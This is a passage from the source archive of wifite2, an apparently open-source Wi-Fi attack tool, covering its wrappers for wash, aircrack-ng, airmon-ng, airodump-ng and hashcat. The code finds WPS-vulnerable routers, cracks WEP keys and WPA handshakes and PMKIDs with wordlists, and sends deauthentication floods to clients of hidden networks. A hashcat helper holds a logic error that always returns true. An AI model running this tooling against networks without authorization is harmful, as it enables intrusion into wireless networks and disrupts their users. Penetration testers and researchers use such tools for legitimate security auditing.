b.parse_line(stdout) wifite2-2.7.0/wifite/tools/__init__.py0000755000175000017500000000000014437644461017177 0ustar sophiesophiewifite2-2.7.0/wifite/tools/wash.py0000755000175000017500000000512614437644461016420 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency from ..model.target import WPSState from ..util.process import Process import json class Wash(Dependency): """ Wrapper for Wash program. """ dependency_required = False dependency_name = 'wash' dependency_url = 'https://github.com/t6x/reaver-wps-fork-t6x' def __init__(self): pass @staticmethod def check_for_wps_and_update_targets(capfile, targets): if not Wash.exists(): return command = [ 'wash', '-f', capfile, '-j' # json ] p = Process(command) try: p.wait() lines = p.stdout() except Exception as e: # Manually check for keyboard interrupt as only python 3.x throws # exceptions for subprocess.wait() if isinstance(e, KeyboardInterrupt): raise KeyboardInterrupt from e # Failure is acceptable return # Find all BSSIDs wps_bssids = set() locked_bssids = set() for line in lines.split('\n'): try: obj = json.loads(line) bssid = obj['bssid'] locked = obj['wps_locked'] if not locked: wps_bssids.add(bssid) else: locked_bssids.add(bssid) except Exception as e: if isinstance(e, KeyboardInterrupt): raise KeyboardInterrupt from e # Update targets for t in targets: target_bssid = t.bssid.upper() if target_bssid in wps_bssids: t.wps = WPSState.UNLOCKED elif target_bssid in locked_bssids: t.wps = WPSState.LOCKED else: t.wps = WPSState.NONE if __name__ == '__main__': test_file = './tests/files/contains_wps_network.cap' target_bssid = 'A4:2B:8C:16:6B:3A' from ..model.target import Target fields = [ 'A4:2B:8C:16:6B:3A', # BSSID '2015-05-27 19:28:44', '2015-05-27 19:28:46', # Dates '11', # Channel '54', # throughput 'WPA2', 'CCMP TKIP', 'PSK', # AUTH '-58', '2', '0', '0.0.0.0', '9', # ??? 'Test Router Please Ignore', # SSID ] t = Target(fields) targets = [t] # Should update 'wps' field of a target Wash.check_for_wps_and_update_targets(test_file, targets) print(f'Target(BSSID={targets[0].bssid}).wps = {targets[0].wps} (Expected: 1)') assert targets[0].wps == WPSState.UNLOCKED wifite2-2.7.0/wifite/tools/aircrack.py0000755000175000017500000001264514437644461017241 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import os import re from .dependency import Dependency from ..config import Configuration from ..util.process import Process class Aircrack(Dependency): dependency_required = True dependency_name = 'aircrack-ng' dependency_url = 'https://www.aircrack-ng.org/install.html' def __init__(self, ivs_file=None): self.cracked_file = os.path.abspath(os.path.join(Configuration.temp(), 'wepkey.txt')) # Delete previous cracked files if os.path.exists(self.cracked_file): os.remove(self.cracked_file) command = [ 'aircrack-ng', '-a', '1', '-l', self.cracked_file, ] if type(ivs_file) is str: ivs_file = [ivs_file] command.extend(ivs_file) self.pid = Process(command, devnull=True) def is_running(self): return self.pid.poll() is None def is_cracked(self): return os.path.exists(self.cracked_file) def stop(self): """ Stops aircrack process """ if self.pid.poll() is None: self.pid.interrupt() def get_key_hex_ascii(self): if not self.is_cracked(): raise Exception('Cracked file not found') with open(self.cracked_file, 'r') as fid: hex_raw = fid.read() return self._hex_and_ascii_key(hex_raw) @staticmethod def _hex_and_ascii_key(hex_raw): hex_chars = [] ascii_key = '' for index in range(0, len(hex_raw), 2): byt = hex_raw[index:index + 2] hex_chars.append(byt) byt_int = int(byt, 16) if byt_int < 32 or byt_int > 127 or ascii_key is None: ascii_key = None # Not printable else: ascii_key += chr(byt_int) hex_key = ':'.join(hex_chars) return hex_key, ascii_key def __del__(self): if os.path.exists(self.cracked_file): os.remove(self.cracked_file) @staticmethod def crack_handshake(handshake, show_command=False): from ..util.color import Color from ..util.timer import Timer '''Tries to crack a handshake. Returns WPA key if found, otherwise None.''' key_file = Configuration.temp('wpakey.txt') command = [ 'aircrack-ng', '-a', '2', '-w', Configuration.wordlist, '--bssid', handshake.bssid, '-l', key_file, handshake.capfile ] if show_command: Color.pl('{+} {D}Running: {W}{P}%s{W}' % ' '.join(command)) crack_proc = Process(command) # Report progress of cracking aircrack_nums_re = re.compile(r'(\d+)/(\d+) keys tested.*\(([\d.]+)\s+k/s') aircrack_key_re = re.compile(r'Current passphrase:\s*(\S.*\S)\s*$') num_tried = num_total = 0 percent = num_kps = 0.0 eta_str = 'unknown' current_key = '' while crack_proc.poll() is None: line = crack_proc.pid.stdout.readline() match_nums = aircrack_nums_re.search(line.decode('utf-8')) match_keys = aircrack_key_re.search(line.decode('utf-8')) if match_nums: num_tried = int(match_nums[1]) num_total = int(match_nums[2]) num_kps = float(match_nums[3]) eta_seconds = (num_total - num_tried) / num_kps eta_str = Timer.secs_to_str(eta_seconds) percent = 100.0 * float(num_tried) / float(num_total) elif match_keys: current_key = match_keys[1] else: continue status = '\r{+} {C}Cracking WPA Handshake: %0.2f%%{W}' % percent status += ' ETA: {C}%s{W}' % eta_str status += ' @ {C}%0.1fkps{W}' % num_kps # status += ' ({C}%d{W}/{C}%d{W} keys)' % (num_tried, num_total) status += ' (current key: {C}%s{W})' % current_key Color.clear_entire_line() Color.p(status) Color.pl('') if not os.path.exists(key_file): return None with open(key_file, 'r') as fid: key = fid.read().strip() os.remove(key_file) return key if __name__ == '__main__': (hexkey, asciikey) = Aircrack._hex_and_ascii_key('A1B1C1D1E1') assert ( hexkey == 'A1:B1:C1:D1:E1' ), f'hexkey was "{hexkey}", expected "A1:B1:C1:D1:E1"' assert asciikey is None, f'asciikey was "{asciikey}", expected None' (hexkey, asciikey) = Aircrack._hex_and_ascii_key('6162636465') assert ( hexkey == '61:62:63:64:65' ), f'hexkey was "{hexkey}", expected "61:62:63:64:65"' assert asciikey == 'abcde', f'asciikey was "{asciikey}", expected "abcde"' from time import sleep Configuration.initialize(False) ivs_file = 'tests/files/wep-crackable.ivs' print(f'Running aircrack on {ivs_file} ...') aircrack = Aircrack(ivs_file) while aircrack.is_running(): sleep(1) assert aircrack.is_cracked(), f'Aircrack should have cracked {ivs_file}' print('aircrack process completed.') (hexkey, asciikey) = aircrack.get_key_hex_ascii() print(f'aircrack found HEX key: ({hexkey}) and ASCII key: ({asciikey})') assert ( hexkey == '75:6E:63:6C:65' ), f'hexkey was "{hexkey}", expected "75:6E:63:6C:65"' assert asciikey == 'uncle', f'asciikey was "{asciikey}", expected "uncle"' Configuration.exit_gracefully(0) wifite2-2.7.0/wifite/tools/airmon.py0000755000175000017500000004160014437644461016740 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import contextlib import os import re import signal from .dependency import Dependency from .ip import Ip from .iw import Iw from ..config import Configuration from ..util.color import Color from ..util.process import Process class AirmonIface(object): def __init__(self, phy, interface, driver, chipset): self.phy = phy self.interface = interface self.driver = driver self.chipset = chipset # Max length of fields. # Used for printing a table of interfaces. INTERFACE_LEN = 12 PHY_LEN = 6 DRIVER_LEN = 20 CHIPSET_LEN = 30 def __str__(self): """ Colored string representation of interface """ s = '' s += Color.s('{G}%s' % self.interface.ljust(self.INTERFACE_LEN)) s += Color.s('{W}%s' % self.phy.ljust(self.PHY_LEN)) s += Color.s('{C}%s' % self.driver.ljust(self.DRIVER_LEN)) s += Color.s('{W}%s' % self.chipset.ljust(self.CHIPSET_LEN)) return s @staticmethod def menu_header(): """ Colored header row for interfaces """ s = ' ' + 'Interface'.ljust(AirmonIface.INTERFACE_LEN) s += 'PHY'.ljust(AirmonIface.PHY_LEN) s += 'Driver'.ljust(AirmonIface.DRIVER_LEN) s += 'Chipset'.ljust(AirmonIface.CHIPSET_LEN) s += '\n' s += '-' * \ (AirmonIface.INTERFACE_LEN + AirmonIface.PHY_LEN + AirmonIface.DRIVER_LEN + AirmonIface.CHIPSET_LEN + 3) return s class Airmon(Dependency): """ Wrapper around the 'airmon-ng' program """ dependency_required = True dependency_name = 'airmon-ng' dependency_url = 'https://www.aircrack-ng.org/install.html' chipset_table = 'https://wikidevi.com/wiki/Wireless_adapters/Chipset_table' base_interface = None killed_network_manager = False use_ipiw = False isdeprecated = False # Drivers that need to be manually put into monitor mode BAD_DRIVERS = ['rtl8821au'] DEPRECATED_DRIVERS = ['rtl8723cs'] # see if_arp.h ARPHRD_ETHER = 1 # managed ARPHRD_IEEE80211_RADIOTAP = 803 # monitor def __init__(self): self.interfaces = None self.refresh() def refresh(self): """ Get airmon-recognized interfaces """ self.interfaces = Airmon.get_interfaces() def print_menu(self): """ Prints menu """ print((AirmonIface.menu_header())) for idx, interface in enumerate(self.interfaces, start=1): Color.pl(' {G}%d{W}. %s' % (idx, interface)) def get(self, index): """ Gets interface at index (starts at 1) """ if type(index) is str: index = int(index) return self.interfaces[index - 1] @staticmethod def get_interfaces(): """Returns List of AirmonIface objects known by airmon-ng""" interfaces = [] p = Process('airmon-ng') for line in p.stdout().split('\n'): # [PHY ]IFACE DRIVER CHIPSET airmon_re = re.compile(r'^(?:([^\t]*)\t+)?([^\t]*)\t+([^\t]*)\t+([^\t]*)$') matches = airmon_re.match(line) if not matches: continue phy, interface, driver, chipset = matches.groups() if phy in ['PHY', 'Interface']: continue # Header if len(interface.strip()) == 0: continue interfaces.append(AirmonIface(phy, interface, driver, chipset)) return interfaces @staticmethod def get_iface_info(interface_name): """ Get interface info (driver, chipset), based on interface name. Returns an AirmonIface if interface name is found by airmon-ng or None """ return next((iface for iface in Airmon.get_interfaces() if iface.interface == interface_name), None) @staticmethod def start_bad_driver(interface, isdeprecated=False): """ Manually put interface into monitor mode (no airmon-ng or vif). Fix for bad drivers like the rtl8812AU. """ Ip.down(interface) if isdeprecated: Process(['iwconfig', interface, 'mode', 'monitor']).stdout() else: Iw.mode(interface, 'monitor') Ip.up(interface) # /sys/class/net/wlan0/type iface_type_path = os.path.join('/sys/class/net', interface, 'type') if os.path.exists(iface_type_path): with open(iface_type_path, 'r') as f: if int(f.read()) == Airmon.ARPHRD_IEEE80211_RADIOTAP: return interface return interface @staticmethod def stop_bad_driver(interface): """ Manually put interface into managed mode (no airmon-ng or vif). Fix for bad drivers like the rtl8812AU. """ Ip.down(interface) Iw.mode(interface, 'managed') Ip.up(interface) # /sys/class/net/wlan0/type iface_type_path = os.path.join('/sys/class/net', interface, 'type') if os.path.exists(iface_type_path): with open(iface_type_path, 'r') as f: if int(f.read()) == Airmon.ARPHRD_ETHER: return interface return interface @classmethod def start(cls, interface): """ Starts an interface (iface) in monitor mode Args: iface - The interface to start in monitor mode Either an instance of AirmonIface object, or the name of the interface (string). Returns: Name of the interface put into monitor mode. Throws: Exception - If an interface can't be put into monitor mode """ # Get interface name from input if type(interface) == AirmonIface: iface_name = interface.interface driver = interface.driver else: iface_name = interface driver = None # Remember this as the 'base' interface. Airmon.base_interface = iface_name # If driver is deprecated then skip airmon-ng if driver not in Airmon.DEPRECATED_DRIVERS: # Try to enable using Airmon-ng first (for better compatibility) Color.p('{+} Enabling {G}monitor mode{W} on {C}%s{W}... ' % iface_name) airmon_output = Process(['airmon-ng', 'start', iface_name]).stdout() enabled_interface = Airmon._parse_airmon_start(airmon_output) else: enabled_interface = None # if it fails, try to use ip/iw if enabled_interface is None: Airmon.isdeprecated = driver in Airmon.DEPRECATED_DRIVERS enabled_interface = Airmon.start_bad_driver(iface_name, Airmon.isdeprecated) else: # If not, just set for us know how it went in monitor mode cls.use_ipiw = True if not Airmon.isdeprecated: # if that also fails, just give up if enabled_interface is None: Color.pl('{R}failed{W}') # Assert that there is an interface in monitor mode interfaces = Iw.get_interfaces(mode='monitor') if len(interfaces) == 0: Color.pl('{R}failed{W}') raise Exception('Cannot find any interfaces in monitor mode') # Assert that the interface enabled by airmon-ng is in monitor mode if enabled_interface not in interfaces: Color.pl('{R}failed{W}') raise Exception(f'Cannot find {enabled_interface} with type:monitor') # No errors found; the device 'enabled_iface' was put into Mode:Monitor. Color.pl('{G}enabled{W}!') return enabled_interface @staticmethod def _parse_airmon_start(airmon_output): """Find the interface put into monitor mode (if any)""" # airmon-ng output: (mac80211 monitor mode vif enabled for [phy10]wlan0 on [phy10]wlan0mon) enabled_re = re.compile(r'.*\(mac80211 monitor mode (?:vif )?enabled (?:for [^ ]+ )?on (?:\[\w+])?(\w+)\)?.*') lines = airmon_output.split('\n') for index, line in enumerate(lines): if matches := enabled_re.match(line): return matches[1] if "monitor mode enabled" in line: return re.sub(r'\s+', ' ', lines[index - 1]).split(' ')[1] return None @classmethod def stop(cls, interface): Color.p('{!}{W} Disabling {O}monitor{W} mode on {R}%s{W}...\n' % interface) if cls.use_ipiw: enabled_interface = disabled_interface = Airmon.stop_bad_driver(interface) else: airmon_output = Process(['airmon-ng', 'stop', interface]).stdout() (disabled_interface, enabled_interface) = Airmon._parse_airmon_stop(airmon_output) if disabled_interface: Color.pl('{+}{W} Disabled monitor mode on {G}%s{W}' % disabled_interface) else: Color.pl('{!} {O}Could not disable {R}%s{W}' % interface) return disabled_interface, enabled_interface @staticmethod def _parse_airmon_stop(airmon_output): """Find the interface taken out of into monitor mode (if any)""" # airmon-ng 1.2rc2 output: (mac80211 monitor mode vif enabled for [phy10]wlan0 on [phy10]wlan0mon) disabled_re = re.compile(r'\s*\(mac80211 monitor mode (?:vif )?disabled for (?:\[\w+])?(\w+)\)\s*') # airmon-ng 1.2rc1 output: wlan0mon (removed) removed_re = re.compile(r'([a-zA-Z\d]+).*\(removed\)') # Enabled interface: (mac80211 station mode vif enabled on [phy4]wlan0) enabled_re = re.compile(r'\s*\(mac80211 station mode (?:vif )?enabled on (?:\[\w+])?(\w+)\)\s*') disabled_interface = None enabled_interface = None for line in airmon_output.split('\n'): if matches := disabled_re.match(line): disabled_interface = matches[1] if matches := removed_re.match(line): disabled_interface = matches[1] if matches := enabled_re.match(line): enabled_interface = matches[1] return disabled_interface, enabled_interface @staticmethod def ask(): """ Asks user to define which wireless interface to use. Does not ask if: 1. There is already an interface in monitor mode, or 2. There is only one wireless interface (automatically selected). Puts selected device into Monitor Mode. """ Airmon.terminate_conflicting_processes() Color.p('\n{+} Looking for {C}wireless interfaces{W}...') monitor_interfaces = Iw.get_interfaces(mode='monitor') if len(monitor_interfaces) == 1: # Assume we're using the device already in monitor mode interface = monitor_interfaces[0] Color.clear_entire_line() Color.pl('{+} Using {G}%s{W} already in monitor mode' % interface) Airmon.base_interface = None return interface Color.clear_entire_line() Color.p('{+} Checking {C}airmon-ng{W}...') a = Airmon() if len(a.interfaces) == 0: # No interfaces found Color.pl('\n{!} {O}airmon-ng did not find {R}any{O} wireless interfaces') Color.pl('{!} {O}Make sure your wireless device is connected') Color.pl('{!} {O}See {C}https://www.aircrack-ng.org/doku.php?id=airmon-ng{O} for more info{W}') raise Exception('airmon-ng did not find any wireless interfaces') Color.clear_entire_line() a.print_menu() Color.pl('') if len(a.interfaces) == 1: # Only one interface, assume this is the one to use choice = 1 else: # Multiple interfaces found Color.p('{+} Select wireless interface ({G}1-%d{W}): ' % len(a.interfaces)) choice = input() selected = a.get(choice) if a.get(choice).interface in monitor_interfaces: Color.pl('{+} {G}%s{W} is already in monitor mode' % selected.interface) else: selected.interface = Airmon.start(selected) return selected.interface @staticmethod def terminate_conflicting_processes(): """ Deletes conflicting processes reported by airmon-ng """ airmon_output = Process(['airmon-ng', 'check']).stdout() # Conflicting process IDs and names pid_pnames = [] # 2272 dhclient # 2293 NetworkManager pid_pname_re = re.compile(r'^\s*(\d+)\s*([a-zA-Z\d_\-]+)\s*$') for line in airmon_output.split('\n'): if match := pid_pname_re.match(line): pid = match[1] pname = match[2] pid_pnames.append((pid, pname)) if not pid_pnames: return if not Configuration.kill_conflicting_processes: # Don't kill processes, warn user names_and_pids = ', '.join([ '{R}%s{O} (PID {R}%s{O})' % (pname, pid) for pid, pname in pid_pnames ]) Color.pl('{!} {O}Conflicting processes: %s' % names_and_pids) Color.pl('{!} {O}If you have problems: {R}kill -9 PID{O} or re-run wifite with {R}--kill{O}{W}') return Color.pl('{!} {O}Killing {R}%d {O}conflicting processes' % len(pid_pnames)) for pid, pname in pid_pnames: if pname == 'NetworkManager' and Process.exists('systemctl'): Color.pl('{!} {O}stopping NetworkManager ({R}systemctl stop NetworkManager{O})') # Can't just pkill NetworkManager; it's a service Process(['systemctl', 'stop', 'NetworkManager']).wait() Airmon.killed_network_manager = True elif pname == 'network-manager' and Process.exists('service'): Color.pl('{!} {O}stopping network-manager ({R}service network-manager stop{O})') # Can't just pkill network manager; it's a service Process(['service', 'network-manager', 'stop']).wait() Airmon.killed_network_manager = True elif pname == 'avahi-daemon' and Process.exists('service'): Color.pl('{!} {O}stopping avahi-daemon ({R}service avahi-daemon stop{O})') # Can't just pkill avahi-daemon; it's a service Process(['service', 'avahi-daemon', 'stop']).wait() else: Color.pl('{!} {R}Terminating {O}conflicting process {R}%s{O} (PID {R}%s{O})' % (pname, pid)) with contextlib.suppress(Exception): os.kill(int(pid), signal.SIGTERM) @staticmethod def put_interface_up(interface): Color.p('{!}{W} Putting interface {R}%s{W} {G}up{W}...\n' % interface) Ip.up(interface) Color.pl('{+}{W} Done !') @staticmethod def start_network_manager(): Color.p('{!} {O}start {R}NetworkManager{O}...') if Process.exists('service'): cmd = 'service networkmanager start' proc = Process(cmd) (out, err) = proc.get_output() if proc.poll() != 0: Color.pl(' {R}Error executing {O}%s{W}' % cmd) if out is not None and out.strip() != '': Color.pl('{!} {O}STDOUT> %s{W}' % out) if err is not None and err.strip() != '': Color.pl('{!} {O}STDERR> %s{W}' % err) else: Color.pl(' {G}Done{W} ({C}%s{W})' % cmd) return if Process.exists('systemctl'): cmd = 'systemctl start NetworkManager' proc = Process(cmd) (out, err) = proc.get_output() if proc.poll() != 0: Color.pl(' {R}Error executing {O}%s{W}' % cmd) if out is not None and out.strip() != '': Color.pl('{!} {O}STDOUT> %s{W}' % out) if err is not None and err.strip() != '': Color.pl('{!} {O}STDERR> %s{W}' % err) else: Color.pl(' {G}done{W} ({C}%s{W})' % cmd) return else: Color.pl(' {R}Cannot start NetworkManager: {O}systemctl{R} or {O}service{R} not found{W}') if __name__ == '__main__': stdout = ''' Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 5563 avahi-daemon 5564 avahi-daemon PHY Interface Driver Chipset phy0 wlx00c0ca4ecae0 rtl8187 Realtek Semiconductor Corp. RTL8187 Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name. (mac80211 monitor mode vif enabled on [phy0]wlan0mon (mac80211 station mode vif disabled for [phy0]wlx00c0ca4ecae0) ''' start_iface = Airmon._parse_airmon_start(stdout) print(('start_iface from stdout:', start_iface)) Configuration.initialize(False) iface = Airmon.ask() (disabled_iface, enabled_iface) = Airmon.stop(iface) print(('Disabled:', disabled_iface)) print(('Enabled:', enabled_iface)) wifite2-2.7.0/wifite/tools/airodump.py0000755000175000017500000003311114437644461017271 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency from .tshark import Tshark from .wash import Wash from ..util.process import Process from ..config import Configuration from ..model.target import Target, WPSState from ..model.client import Client import os import time class Airodump(Dependency): """ Wrapper around airodump-ng program """ dependency_required = True dependency_name = 'airodump-ng' dependency_url = 'https://www.aircrack-ng.org/install.html' def __init__(self, interface=None, channel=None, encryption=None, wps=WPSState.UNKNOWN, target_bssid=None, output_file_prefix='airodump', ivs_only=False, skip_wps=False, delete_existing_files=True): """Sets up airodump arguments, doesn't start process yet.""" Configuration.initialize() if interface is None: interface = Configuration.interface if interface is None: raise Exception('Wireless interface must be defined (-i)') self.interface = interface self.targets = [] if channel is None: channel = Configuration.target_channel self.channel = channel self.all_bands = Configuration.all_bands self.two_ghz = Configuration.two_ghz self.five_ghz = Configuration.five_ghz self.encryption = encryption self.wps = wps self.target_bssid = target_bssid self.output_file_prefix = output_file_prefix self.ivs_only = ivs_only self.skip_wps = skip_wps # For tracking decloaked APs (previously were hidden) self.decloaking = False self.decloaked_times = {} # Map of BSSID(str) -> epoch(int) of last deauth self.delete_existing_files = delete_existing_files def __enter__(self): """ Setting things up for this context. Called at start of 'with Airodump(...) as x:' Actually starts the airodump process. """ if self.delete_existing_files: self.delete_airodump_temp_files(self.output_file_prefix) self.csv_file_prefix = Configuration.temp() + self.output_file_prefix # Build the command command = [ 'airodump-ng', self.interface, '--background', '1', # Force "background mode" since we rely on csv instead of stdout '-a', # Only show associated clients '-w', self.csv_file_prefix, # Output file prefix '--write-interval', '1' # Write every second ] if self.channel: command.extend(['-c', str(self.channel)]) elif self.all_bands: command.extend(['--band', 'abg']) elif self.two_ghz: command.extend(['--band', 'bg']) elif self.five_ghz: command.extend(['--band', 'a']) if self.encryption: command.extend(['--enc', self.encryption]) if self.wps: command.extend(['--wps']) if self.target_bssid: command.extend(['--bssid', self.target_bssid]) if self.ivs_only: command.extend(['--output-format', 'ivs,csv']) else: command.extend(['--output-format', 'pcap,csv']) # Store value for debugging self.command = command # Start the process self.pid = Process(command, devnull=True) return self def __exit__(self, type, value, traceback): """ Tearing things down since the context is being exited. Called after 'with Airodump(...)' goes out of scope. """ # Kill the process self.pid.interrupt() if self.delete_existing_files: self.delete_airodump_temp_files(self.output_file_prefix) def find_files(self, endswith=None): return self.find_files_by_output_prefix(self.output_file_prefix, endswith=endswith) @classmethod def find_files_by_output_prefix(cls, output_file_prefix, endswith=None): """ Finds all files in the temp directory that start with the output_file_prefix """ result = [] temp = Configuration.temp() for fil in os.listdir(temp): if not fil.startswith(output_file_prefix): continue if endswith is None or fil.endswith(endswith): result.append(os.path.join(temp, fil)) return result @classmethod def delete_airodump_temp_files(cls, output_file_prefix): """ Deletes airodump* files in the temp directory. Also deletes replay_*.cap and *.xor files in pwd. """ # Remove all temp files for fil in cls.find_files_by_output_prefix(output_file_prefix): os.remove(fil) # Remove .cap and .xor files from pwd for fil in os.listdir('.'): if fil.startswith('replay_') and fil.endswith('.cap') or fil.endswith('.xor'): os.remove(fil) # Remove replay/cap/xor files from temp temp_dir = Configuration.temp() for fil in os.listdir(temp_dir): if fil.startswith('replay_') and fil.endswith('.cap') or fil.endswith('.xor'): os.remove(os.path.join(temp_dir, fil)) def get_targets(self, old_targets=None, apply_filter=True, target_archives=None): """ Parses airodump's CSV file, returns list of Targets """ if old_targets is None: old_targets = [] if target_archives is None: target_archives = {} # Find the .CSV file csv_filename = None for fil in self.find_files(endswith='.csv'): csv_filename = fil # Found the file break if csv_filename is None or not os.path.exists(csv_filename): return self.targets # No file found new_targets = Airodump.get_targets_from_csv(csv_filename) # Check if one of the targets is also contained in the old_targets for new_target in new_targets: just_found = True for old_target in old_targets: # If the new_target is found in old_target copy attributes from old target if old_target == new_target: # Identify decloaked targets if new_target.essid_known and not old_target.essid_known: # We decloaked a target! new_target.decloaked = True old_target.transfer_info(new_target) just_found = False break # If the new_target is not in old_targets, check target_archives # and copy attributes from there if just_found and new_target.bssid in target_archives: target_archives[new_target.bssid].transfer_info(new_target) # Check targets for WPS if not self.skip_wps: capfile = f'{csv_filename[:-3]}cap' try: Tshark.check_for_wps_and_update_targets(capfile, new_targets) except ValueError: # No tshark, or it failed. Fall-back to wash Wash.check_for_wps_and_update_targets(capfile, new_targets) if apply_filter: # Filter targets based on encryption, WPS capability & power new_targets = Airodump.filter_targets(new_targets, skip_wps=self.skip_wps) # Sort by power new_targets.sort(key=lambda x: x.power, reverse=True) self.targets = new_targets self.deauth_hidden_targets() return self.targets @staticmethod def get_targets_from_csv(csv_filename): """Returns list of Target objects parsed from CSV file.""" targets = [] import chardet import csv with open(csv_filename, "rb") as rawdata: encoding = chardet.detect(rawdata.read())['encoding'] with open(csv_filename, 'r', encoding=encoding, errors='ignore') as csvopen: lines = [] for line in csvopen: line = line.replace('\0', '') lines.append(line) csv_reader = csv.reader(lines, delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True, escapechar='\\') hit_clients = False for row in csv_reader: # Each 'row' is a list of fields for a target/client if len(row) == 0: continue if row[0].strip() == 'BSSID': # This is the 'header' for the list of Targets hit_clients = False continue elif row[0].strip() == 'Station MAC': # This is the 'header' for the list of Clients hit_clients = True continue if hit_clients: # The current row corresponds to a 'Client' (computer) try: client = Client(row) except (IndexError, ValueError): # Skip if we can't parse the client row continue if 'not associated' in client.bssid: # Ignore unassociated clients continue # Add this client to the appropriate Target for t in targets: if t.bssid == client.bssid: t.clients.append(client) break else: # The current row corresponds to a 'Target' (router) try: target = Target(row) targets.append(target) except Exception: continue return targets @staticmethod def filter_targets(targets, skip_wps=False): """ Filters targets based on Configuration """ result = [] # Filter based on Encryption for target in targets: # Filter targets if --power # TODO Filter a target based on the current power - not on the max power # as soon as losing targets in a single scan does not cause excessive output if Configuration.min_power > 0 and target.max_power < Configuration.min_power: continue if Configuration.clients_only and len(target.clients) == 0: continue if 'WEP' in Configuration.encryption_filter and 'WEP' in target.encryption: result.append(target) elif 'WPA' in Configuration.encryption_filter and 'WPA' in target.encryption: result.append(target) elif 'WPS' in Configuration.encryption_filter and target.wps in [WPSState.UNLOCKED, WPSState.LOCKED]: result.append(target) elif skip_wps: result.append(target) # Filter based on BSSID/ESSID bssid = Configuration.target_bssid essid = Configuration.target_essid i = 0 while i < len(result): if result[i].essid is not None and\ Configuration.ignore_essids is not None and\ result[i].essid in Configuration.ignore_essids: result.pop(i) elif Configuration.ignore_cracked and \ result[i].bssid in Configuration.ignore_cracked: result.pop(i) elif bssid and result[i].bssid.lower() != bssid.lower(): result.pop(i) elif essid and result[i].essid and result[i].essid != essid: result.pop(i) else: i += 1 return result def deauth_hidden_targets(self): """ Sends deauths (to broadcast and to each client) for all targets (APs) that have unknown ESSIDs (hidden router names). """ self.decloaking = False if Configuration.no_deauth: return # Do not deauth if requested if self.channel is None: return # Do not deauth if channel is not fixed. # Reusable deauth command deauth_cmd = [ 'aireplay-ng', '-0', # Deauthentication str(Configuration.num_deauths), # Number of deauth packets to send '--ignore-negative-one' ] for target in self.targets: if target.essid_known: continue now = int(time.time()) secs_since_decloak = now - self.decloaked_times.get(target.bssid, 0) if secs_since_decloak < 30: continue # Decloak every AP once every 30 seconds self.decloaking = True self.decloaked_times[target.bssid] = now if Configuration.verbose > 1: from ..util.color import Color Color.pe('{C} [?] Deauthing %s (broadcast & %d clients){W}' % (target.bssid, len(target.clients))) # Deauth broadcast iface = Configuration.interface Process(deauth_cmd + ['-a', target.bssid, iface]) # Deauth clients for client in target.clients: Process(deauth_cmd + ['-a', target.bssid, '-c', client.bssid, iface]) if __name__ == '__main__': ''' Example usage. wlan0mon should be in Monitor Mode ''' with Airodump() as airodump: from time import sleep sleep(7) from ..util.color import Color targets = airodump.get_targets() for idx, target in enumerate(targets, start=1): Color.pl(' {G}%s %s' % (str(idx).rjust(3), target.to_str())) Configuration.delete_temp() wifite2-2.7.0/wifite/tools/hashcat.py0000755000175000017500000001460214437644461017070 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .dependency import Dependency from ..config import Configuration from ..util.process import Process from ..util.color import Color import os hccapx_autoremove = False # change this to True if you want the hccapx files to be automatically removed class Hashcat(Dependency): dependency_required = False dependency_name = 'hashcat' dependency_url = 'https://hashcat.net/hashcat/' @staticmethod def should_use_force(): command = ['hashcat', '-I'] stderr = Process(command).stderr() return 'No devices found/left' or 'Unstable OpenCL driver detected!' in stderr @staticmethod def crack_handshake(handshake, show_command=False): # Generate hccapx hccapx_file = HcxPcapngTool.generate_hccapx_file(handshake, show_command=show_command) key = None # Crack hccapx for additional_arg in ([], ['--show']): command = [ 'hashcat', '--quiet', '-m', '22000', hccapx_file, Configuration.wordlist ] if Hashcat.should_use_force(): command.append('--force') command.extend(additional_arg) if show_command: Color.pl(f'{{+}} {{D}}Running: {{W}}{{P}}{" ".join(command)}{{W}}') process = Process(command) stdout, stderr = process.get_output() if ':' not in stdout: continue key = stdout.split(':', 5)[-1].strip() break return key @staticmethod def crack_pmkid(pmkid_file, verbose=False): """ Cracks a given pmkid_file using the PMKID/WPA2 attack (-m 22000) Returns: Key (str) if found; `None` if not found. """ # Run hashcat once normally, then with --show if it failed # To catch cases where the password is already in the pot file. for additional_arg in ([], ['--show']): command = [ 'hashcat', '--quiet', # Only output the password if found. '-m', '22000', # WPA-PMKID-PBKDF2 '-a', '0', # Wordlist attack-mode pmkid_file, Configuration.wordlist, '-w', '3' ] if Hashcat.should_use_force(): command.append('--force') command.extend(additional_arg) if verbose and additional_arg == []: Color.pl(f'{{+}} {{D}}Running: {{W}}{{P}}{" ".join(command)}{{W}}') # TODO: Check status of hashcat (%); it's impossible with --quiet hashcat_proc = Process(command) hashcat_proc.wait() stdout = hashcat_proc.stdout() if ':' not in stdout: # Failed continue else: return stdout.strip().split(':', 1)[1] class HcxDumpTool(Dependency): dependency_required = False dependency_name = 'hcxdumptool' dependency_url = 'apt install hcxdumptool' def __init__(self, target, pcapng_file): # Create filterlist filterlist = Configuration.temp('pmkid.filterlist') with open(filterlist, 'w') as filter_handle: filter_handle.write(target.bssid.replace(':', '')) if os.path.exists(pcapng_file): os.remove(pcapng_file) command = [ 'hcxdumptool', '-i', Configuration.interface, '-c', str(target.channel) + 'a', '-w', pcapng_file ] self.proc = Process(command) def poll(self): return self.proc.poll() def interrupt(self): self.proc.interrupt() class HcxPcapngTool(Dependency): dependency_required = False dependency_name = 'hcxpcapngtool' dependency_url = 'apt install hcxtools' def __init__(self, target): self.target = target self.bssid = self.target.bssid.lower().replace(':', '') self.pmkid_file = Configuration.temp(f'pmkid-{self.bssid}.22000') @staticmethod def generate_hccapx_file(handshake, show_command=False): hccapx_file = Configuration.temp('generated.hccapx') if os.path.exists(hccapx_file): os.remove(hccapx_file) command = [ 'hcxpcapngtool', '-o', hccapx_file, handshake.capfile ] if show_command: Color.pl('{+} {D}Running: {W}{P}%s{W}' % ' '.join(command)) process = Process(command) stdout, stderr = process.get_output() if not os.path.exists(hccapx_file): raise ValueError('Failed to generate .hccapx file, output: \n%s\n%s' % ( 